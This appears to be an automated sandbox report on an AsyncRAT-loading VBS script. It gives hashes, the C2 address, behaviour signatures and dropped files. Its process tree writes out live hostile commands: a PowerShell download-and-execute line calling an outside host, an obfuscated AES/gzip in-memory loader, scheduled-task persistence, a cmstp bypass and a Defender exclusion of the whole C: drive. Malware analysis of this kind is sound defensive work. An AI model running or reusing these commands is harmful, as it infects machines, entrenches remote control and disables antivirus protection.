Analysis

  • max time kernel
    100s
  • max time network
    140s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    09-12-2024 17:14

General

  • Target

    6890_output.vbs

  • Size

    46KB

  • MD5

    653bf44f38fbe35cb4a51a366cce85e1

  • SHA1

    5f08110e8b8174d62eb8beb3d8eedf507dc6471c

  • SHA256

    0442d85e2af50c1f41e7cbf46850a204cf7cfd49eb5f0244e8b60cc28c313c24

  • SHA512

    ed5c78d769eed4667ce8cceb14af498fcf41c36db88e47611f2157708513955a188a9aa60404cb99f632ca2b10596dfad60df3a9320083b92da14529ebdded19

  • SSDEEP

    768:msJNohJ2GoBFClzkP/TFYgZutKI/OLixhGpOQU40GmaXQq9+RfomiJrW7PuA9:mTWGsClzkmtKIxGp1UOmWYfomiKH

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

87.120.113.125:55644

Mutex

WzRdrlEJS302

Attributes
  • delay

    3

  • install

    true

  • install_file

    dwmm.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6890_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4608
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3vjxiheh\3vjxiheh.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:880
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74D2.tmp" "c:\Users\Admin\AppData\Local\Temp\3vjxiheh\CSCF160F39F16B4B76A79DAD0DA7FAA71.TMP"
            5⤵
              PID:3732
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\iggnhd45.inf
            4⤵
              PID:1984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2336
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1480
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\c.bat';$HtXR='ChLohBanLohBgLohBeExLohBteLohBnsLohBiLohBoLohBnLohB'.Replace('LohB', ''),'EnakFatrakFayPakFaoinakFatakFa'.Replace('akFa', ''),'DZRsYeZRsYcZRsYomZRsYpZRsYreZRsYsZRsYsZRsY'.Replace('ZRsY', ''),'CoCMmrpCMmryCMmrTCMmroCMmr'.Replace('CMmr', ''),'GefhddtCfhddurfhddrenfhddtfhddPfhddrocfhddefhddssfhdd'.Replace('fhdd', ''),'EleBsgfmeBsgfntABsgftBsgf'.Replace('Bsgf', ''),'FrTYXjomBTYXjaseTYXj64TYXjStrTYXjingTYXj'.Replace('TYXj', ''),'ReCDPWaCDPWdCDPWLiCDPWnesCDPW'.Replace('CDPW', ''),'TraKWcknKWcksfoKWckrKWckmFKWckinKWckaKWcklBKWckloKWckcKWckkKWck'.Replace('KWck', ''),'MjblMajblMijblMnjblMMjblMojblMdjblMuljblMejblM'.Replace('jblM', ''),'SnrJTplinrJTtnrJT'.Replace('nrJT', ''),'CrOEfHeaOEfHtOEfHeDeOEfHcryOEfHptoOEfHrOEfH'.Replace('OEfH', ''),'LBxjCoBxjCadBxjC'.Replace('BxjC', ''),'IjtXpnvjtXpojtXpkjtXpejtXp'.Replace('jtXp', '');powershell -w hidden;function wyHTI($FyZFc){$vRVbM=[System.Security.Cryptography.Aes]::Create();$vRVbM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vRVbM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vRVbM.Key=[System.Convert]::($HtXR[6])('3eo8NN5tyKFa5visFn25QtJ0+4AjjFD7mC5TBO0PoNc=');$vRVbM.IV=[System.Convert]::($HtXR[6])('zdwkfoYoSPrzLDtsSJb42A==');$LDSfU=$vRVbM.($HtXR[11])();$ZfRpI=$LDSfU.($HtXR[8])($FyZFc,0,$FyZFc.Length);$LDSfU.Dispose();$vRVbM.Dispose();$ZfRpI;}function XfTte($FyZFc){$eHJHJ=New-Object System.IO.MemoryStream(,$FyZFc);$RoEKy=New-Object System.IO.MemoryStream;$bZzEN=New-Object System.IO.Compression.GZipStream($eHJHJ,[IO.Compression.CompressionMode]::($HtXR[2]));$bZzEN.($HtXR[3])($RoEKy);$bZzEN.Dispose();$eHJHJ.Dispose();$RoEKy.Dispose();$RoEKy.ToArray();}$FWOcx=[System.IO.File]::($HtXR[7])([Console]::Title);$ALHOl=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 5).Substring(2))));$wRWWL=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 6).Substring(2))));[System.Reflection.Assembly]::($HtXR[12])([byte[]]$wRWWL).($HtXR[1]).($HtXR[13])($null,$null);[System.Reflection.Assembly]::($HtXR[12])([byte[]]$ALHOl).($HtXR[1]).($HtXR[13])($null,$null); "
              4⤵
                PID:2256
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4620
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:880
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\c')
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4240
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 81503' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network81503Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3144
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network81503Man.cmd"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3372
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network81503Man.cmd"
                    6⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3972
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network81503Man.cmd';$HtXR='ChLohBanLohBgLohBeExLohBteLohBnsLohBiLohBoLohBnLohB'.Replace('LohB', ''),'EnakFatrakFayPakFaoinakFatakFa'.Replace('akFa', ''),'DZRsYeZRsYcZRsYomZRsYpZRsYreZRsYsZRsYsZRsY'.Replace('ZRsY', ''),'CoCMmrpCMmryCMmrTCMmroCMmr'.Replace('CMmr', ''),'GefhddtCfhddurfhddrenfhddtfhddPfhddrocfhddefhddssfhdd'.Replace('fhdd', ''),'EleBsgfmeBsgfntABsgftBsgf'.Replace('Bsgf', ''),'FrTYXjomBTYXjaseTYXj64TYXjStrTYXjingTYXj'.Replace('TYXj', ''),'ReCDPWaCDPWdCDPWLiCDPWnesCDPW'.Replace('CDPW', ''),'TraKWcknKWcksfoKWckrKWckmFKWckinKWckaKWcklBKWckloKWckcKWckkKWck'.Replace('KWck', ''),'MjblMajblMijblMnjblMMjblMojblMdjblMuljblMejblM'.Replace('jblM', ''),'SnrJTplinrJTtnrJT'.Replace('nrJT', ''),'CrOEfHeaOEfHtOEfHeDeOEfHcryOEfHptoOEfHrOEfH'.Replace('OEfH', ''),'LBxjCoBxjCadBxjC'.Replace('BxjC', ''),'IjtXpnvjtXpojtXpkjtXpejtXp'.Replace('jtXp', '');powershell -w hidden;function wyHTI($FyZFc){$vRVbM=[System.Security.Cryptography.Aes]::Create();$vRVbM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vRVbM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vRVbM.Key=[System.Convert]::($HtXR[6])('3eo8NN5tyKFa5visFn25QtJ0+4AjjFD7mC5TBO0PoNc=');$vRVbM.IV=[System.Convert]::($HtXR[6])('zdwkfoYoSPrzLDtsSJb42A==');$LDSfU=$vRVbM.($HtXR[11])();$ZfRpI=$LDSfU.($HtXR[8])($FyZFc,0,$FyZFc.Length);$LDSfU.Dispose();$vRVbM.Dispose();$ZfRpI;}function XfTte($FyZFc){$eHJHJ=New-Object System.IO.MemoryStream(,$FyZFc);$RoEKy=New-Object System.IO.MemoryStream;$bZzEN=New-Object System.IO.Compression.GZipStream($eHJHJ,[IO.Compression.CompressionMode]::($HtXR[2]));$bZzEN.($HtXR[3])($RoEKy);$bZzEN.Dispose();$eHJHJ.Dispose();$RoEKy.Dispose();$RoEKy.ToArray();}$FWOcx=[System.IO.File]::($HtXR[7])([Console]::Title);$ALHOl=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 5).Substring(2))));$wRWWL=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 6).Substring(2))));[System.Reflection.Assembly]::($HtXR[12])([byte[]]$wRWWL).($HtXR[1]).($HtXR[13])($null,$null);[System.Reflection.Assembly]::($HtXR[12])([byte[]]$ALHOl).($HtXR[1]).($HtXR[13])($null,$null); "
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:4492
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:560
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2668
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network81503Man')
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3980
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 81503' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network81503Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2444
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dwmm" /tr '"C:\Users\Admin\AppData\Roaming\dwmm.exe"' & exit
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:4084
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /tn "dwmm" /tr '"C:\Users\Admin\AppData\Roaming\dwmm.exe"'
                          9⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:964
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAAC2.tmp.bat""
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:2452
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout 3
                          9⤵
                          • System Location Discovery: System Language Discovery
                          • Delays execution with timeout.exe
                          PID:4724
                        • C:\Users\Admin\AppData\Roaming\dwmm.exe
                          "C:\Users\Admin\AppData\Roaming\dwmm.exe"
                          9⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1180
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /nobreak /t 1
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Delays execution with timeout.exe
                      PID:4396
              • C:\Windows\system32\timeout.exe
                timeout /nobreak /t 1
                4⤵
                • Delays execution with timeout.exe
                PID:1536
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
          1⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:416
        • C:\Windows\system32\taskkill.exe
          taskkill /IM cmstp.exe /F
          1⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3700

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          3eb3833f769dd890afc295b977eab4b4

          SHA1

          e857649b037939602c72ad003e5d3698695f436f

          SHA256

          c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

          SHA512

          c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          1KB

          MD5

          25b2ce30904bdc3e8f50d98698989919

          SHA1

          b812ec3da4039cc86757a484f69750a4dfcb4f15

          SHA256

          d42a7f0ca85e0ff0d114cb37367b445224a1088094d4161e4defb2508c85204b

          SHA512

          3d5062e33ace16d200cd9e0d2f2456097bea26029812f483ad2845796f8664e389a346d89d4f88cc62b0acf955e636200a9defd14526066f0e0aa10ed9a4ad9f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Filesize

          21KB

          MD5

          de9cd2c2ecf47402004f661c70b40292

          SHA1

          202aac622d08570d28420112a5fb7394bbf30933

          SHA256

          0d42d2e71b5c0ba1f772f47228a0e072fcb7e88802bbfd57374036f4cf82d9f3

          SHA512

          018c0751d0657544fe6b67de4f748162f3294c25fe280b2232dff87ddd81a95392244df5c8f01463cfa1f4db8d52ebcb98b1cfb80d68de8aa139b23af0132b4d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Filesize

          21KB

          MD5

          83b0672f5c5bd3ea1d2bdb6ce3364035

          SHA1

          b38ef46a9a8f62bf0c54f24439c3c9125be76613

          SHA256

          44c140c3e431f7df8276b026a5b5005cfb26dcaa27ff0b358be53b38502a4101

          SHA512

          3b3d87bdfc4cbe6cc9559a20dc353fe88300c2a556ccc798af3c7f6e4fb58fc729cbb8a725a0fc9340e443b3d85be765ad3565da1cdaecaf67988444a726f656

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          20KB

          MD5

          fc540745a66b3f833f4ebbedf98f4caf

          SHA1

          6a76c8cf452194e053ea69283c31123ed5f2a1ad

          SHA256

          272b1d2d25c1caa82671c3ef22fd9099900b6df66bac81801b68fdc4631dd64c

          SHA512

          b2ef95e333376c3cb845196788f8572b9e260fb60b15bfe1ae7ae6d1f352e1d976db3bacf17333bc78219f4a61b91e6c429a9aa7325f34bdac3e4507c840e61c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          21KB

          MD5

          a4500751586f80731da3c814ef2046f2

          SHA1

          283f3af2d489f58bfd8a987f24f3ef1ae2ae3df0

          SHA256

          568a6dd7ae371d699f9c3c083950c0591bacd7ef89efd351f5712d799fcc18b7

          SHA512

          010548d78713361e9e57a1e8b4f3ad521e22c6d31fa6f164f074e2064c778400acd6e7f00fdb6f1696b1c34ec4bcbeaefb8c7bfcac43582e033e759aa3832128

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          20KB

          MD5

          e0f5960a0556433b232de954a76b8cb3

          SHA1

          217a8fbae907fe13e520d59d836b9be0085fb289

          SHA256

          a944b265801f12fd00e5de30c3c2b67c5eca16a8f882a11a8d288e55389d102d

          SHA512

          04a02e598d0054798dcb127e2be9540574267385cb6f9d7f8779ad540c573d3f599851ba9a351c914e6f7b73c5b4f73e044f62b47d38c0e325aaa22fac9dccdf

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          129b0eae051e116c39b4a49f152aca98

          SHA1

          a8ee88da2dd6724280dcba08760f311589c25cdd

          SHA256

          f510fc496a4bdb4e8045d66b81620156d51c17b33f6499472c00ac72abcf73ff

          SHA512

          62d480dee86e7a08487afdaba6bef104518fd9ba9ecbcbeb0efab87ac09d7e73aed40b84c40b4d602bf758a895eca6acd6b9dae748ca5010942f93a48f383a3a

        • C:\Users\Admin\AppData\Local\Temp\3vjxiheh\3vjxiheh.dll

          Filesize

          4KB

          MD5

          cfcc8b0667278ba2cc89a46b29162f6c

          SHA1

          e13a36ab1a4ebb74b3694783d9c3476f27acd190

          SHA256

          25c4339206e5fb2ba6df4272ad92f9a782234d8c40928fc259572535f9cd5e59

          SHA512

          a19c949f7cadc6c0c919311dc7c310b1059e085c9e7c0aad96e15a6a4fddae27de53808f6bf30959b16b9778debec2d412bf3ec8b5ab2bfc1e53ee7b70c8c944

        • C:\Users\Admin\AppData\Local\Temp\RES74D2.tmp

          Filesize

          1KB

          MD5

          d11b64ed36d2036379b5a1ed2898f051

          SHA1

          628942b1ceff3ece9a144f3813677e3ec2ac3949

          SHA256

          7d6e8cd2cd7a9191ce779cae14814ab5937efbaa4b2586b84da55d038cdbef9d

          SHA512

          eed1204c9bd1098612446811addb5fd38fc486fb149d29ef5512b1f8dcba50515eeb0db03338c2d22339895688c1f37e9a5471c673de692ad804244f3498c9cb

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yaaoaxhy.aag.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\c.bat

          Filesize

          45KB

          MD5

          5e75db78b4eefa9d95b411029918152d

          SHA1

          1d973f2303effe01afd04f4e2f4cb11eb0ea7880

          SHA256

          837356ed1c9ccee26cec4e28385becea54f6ce2ed876e16ef788f9572d97befb

          SHA512

          f3f33476c5a6e1e1941a3e00f458cca79f9cdfba1c1d67f88e1af2d626f3e61cf7bcc8ef21cc9041ecd70e7c393e4f3a5cbcd3f58e0d4dfb08c22682b0f6e1dd

        • C:\Users\Admin\AppData\Local\Temp\tmpAAC2.tmp.bat

          Filesize

          148B

          MD5

          daf933d74f5e05c3ae335bc41618d8a5

          SHA1

          c68e5873f21bdad97dbc521a73752fba1f0d8b97

          SHA256

          2424f0619c462aa263266833b76437bab7787944b86b0e3b59e9e9ce4f30360f

          SHA512

          b33d0c0effbddb240ad58a10a1214e74a9041c8e9fcf6a7706f1b421061968fe6a17d768c6350a45ccc9e516bef6e1b0371bbe2dc8440084f9fc510b70173269

        • C:\Users\Admin\AppData\Roaming\dwmm.exe

          Filesize

          425KB

          MD5

          6bb54b2d7a3d63578559239a79700ea3

          SHA1

          bc8d22b16e9ab2045c3acfb8ff1c0ce97bd9936a

          SHA256

          870eda04ea71cc066ec907f005e1d05ce592f04799c60e600e2cb986dc85b5eb

          SHA512

          5eb2369b6d5cf615d9ef49315ef2278db7cf9a9fe2deb3c2568ff114d51dbd1a9ca4e4ab696e0bf6e2c5d9e3e2c84c706cd550824f3b45b3f7df1690503a4614

        • C:\windows\temp\iggnhd45.inf

          Filesize

          683B

          MD5

          a4fd12b94ad4ac06fabd8dd56dd5ff2b

          SHA1

          940d129205e04ba31b10a72d7a7a236a9ed0488b

          SHA256

          fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

          SHA512

          a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

        • \??\c:\Users\Admin\AppData\Local\Temp\3vjxiheh\3vjxiheh.0.cs

          Filesize

          2KB

          MD5

          897ac4306f2a2524bc3c441bd00c72b9

          SHA1

          1703dbf9a2a78491dfd6685540d4691839e33b69

          SHA256

          a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

          SHA512

          2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

        • \??\c:\Users\Admin\AppData\Local\Temp\3vjxiheh\3vjxiheh.cmdline

          Filesize

          369B

          MD5

          4447a398599cde7e2998909b76e5b0e2

          SHA1

          a57143273a5fc2dffef0fa72ff1dfc122b8201f5

          SHA256

          2d51695044a9227ec484e9e2c15fb1680bd8eaf96c12115deeee2f2f782c482f

          SHA512

          3d737f2a6ee41b41e6608436ba68f4ea7992689249f18d87e95c5da429227b61f45f503f3e4bfd710a7e3b87983e356f755e838a965f061837d2762b7dcff127

        • \??\c:\Users\Admin\AppData\Local\Temp\3vjxiheh\CSCF160F39F16B4B76A79DAD0DA7FAA71.TMP

          Filesize

          652B

          MD5

          a340f1c5c01f25a90458f9c5b3ecb54f

          SHA1

          2aadd1ba4b75504c0cf597e923af593a4de83052

          SHA256

          e98dca9cad2af0c0465120c6a5f8d8219ac2f913b3cfcff1e40f2de51f57cf29

          SHA512

          dfcc6a06a99e7a328b4054aee30046f9c4148862fec936f778ef89cf792b5f4210e4b7e6dc5f9ccb9fef353181779101246152727efd28a3ead383cf2c29e4d7

        • memory/560-208-0x0000000008130000-0x00000000081CC000-memory.dmp

          Filesize

          624KB

        • memory/560-207-0x00000000054A0000-0x00000000054B2000-memory.dmp

          Filesize

          72KB

        • memory/1180-218-0x0000000005950000-0x0000000005CA7000-memory.dmp

          Filesize

          3.3MB

        • memory/2444-196-0x0000000070BE0000-0x0000000070C2C000-memory.dmp

          Filesize

          304KB

        • memory/3144-128-0x0000000070BE0000-0x0000000070C2C000-memory.dmp

          Filesize

          304KB

        • memory/3980-173-0x0000000070BE0000-0x0000000070C2C000-memory.dmp

          Filesize

          304KB

        • memory/3980-183-0x0000000007890000-0x0000000007933000-memory.dmp

          Filesize

          652KB

        • memory/3980-184-0x0000000007B90000-0x0000000007BA1000-memory.dmp

          Filesize

          68KB

        • memory/4240-116-0x00000000078F0000-0x0000000007901000-memory.dmp

          Filesize

          68KB

        • memory/4240-115-0x00000000079C0000-0x0000000007A56000-memory.dmp

          Filesize

          600KB

        • memory/4240-114-0x0000000007780000-0x000000000778A000-memory.dmp

          Filesize

          40KB

        • memory/4240-113-0x0000000007660000-0x0000000007703000-memory.dmp

          Filesize

          652KB

        • memory/4240-112-0x0000000007580000-0x000000000759E000-memory.dmp

          Filesize

          120KB

        • memory/4240-102-0x0000000070BE0000-0x0000000070C2C000-memory.dmp

          Filesize

          304KB

        • memory/4240-101-0x00000000075C0000-0x00000000075F2000-memory.dmp

          Filesize

          200KB

        • memory/4608-44-0x00007FFB39223000-0x00007FFB39225000-memory.dmp

          Filesize

          8KB

        • memory/4608-49-0x00007FFB39220000-0x00007FFB39CE2000-memory.dmp

          Filesize

          10.8MB

        • memory/4608-1-0x0000018578E50000-0x0000018578E72000-memory.dmp

          Filesize

          136KB

        • memory/4608-11-0x00007FFB39220000-0x00007FFB39CE2000-memory.dmp

          Filesize

          10.8MB

        • memory/4608-12-0x00007FFB39220000-0x00007FFB39CE2000-memory.dmp

          Filesize

          10.8MB

        • memory/4608-13-0x00007FFB39220000-0x00007FFB39CE2000-memory.dmp

          Filesize

          10.8MB

        • memory/4608-14-0x000001857B570000-0x000001857B58C000-memory.dmp

          Filesize

          112KB

        • memory/4608-27-0x000001857B590000-0x000001857B598000-memory.dmp

          Filesize

          32KB

        • memory/4608-0-0x00007FFB39223000-0x00007FFB39225000-memory.dmp

          Filesize

          8KB

        • memory/4608-45-0x00007FFB39220000-0x00007FFB39CE2000-memory.dmp

          Filesize

          10.8MB

        • memory/4620-73-0x00000000065D0000-0x000000000661C000-memory.dmp

          Filesize

          304KB

        • memory/4620-59-0x0000000005780000-0x00000000057A2000-memory.dmp

          Filesize

          136KB

        • memory/4620-58-0x00000000058E0000-0x0000000005FAA000-memory.dmp

          Filesize

          6.8MB

        • memory/4620-57-0x0000000002BD0000-0x0000000002C06000-memory.dmp

          Filesize

          216KB

        • memory/4620-66-0x0000000005FB0000-0x0000000006016000-memory.dmp

          Filesize

          408KB

        • memory/4620-62-0x0000000005820000-0x0000000005886000-memory.dmp

          Filesize

          408KB

        • memory/4620-71-0x0000000006120000-0x0000000006477000-memory.dmp

          Filesize

          3.3MB

        • memory/4620-72-0x0000000006580000-0x000000000659E000-memory.dmp

          Filesize

          120KB

        • memory/4620-89-0x0000000007B70000-0x0000000007B7E000-memory.dmp

          Filesize

          56KB

        • memory/4620-74-0x0000000007720000-0x0000000007764000-memory.dmp

          Filesize

          272KB

        • memory/4620-75-0x0000000007960000-0x00000000079D6000-memory.dmp

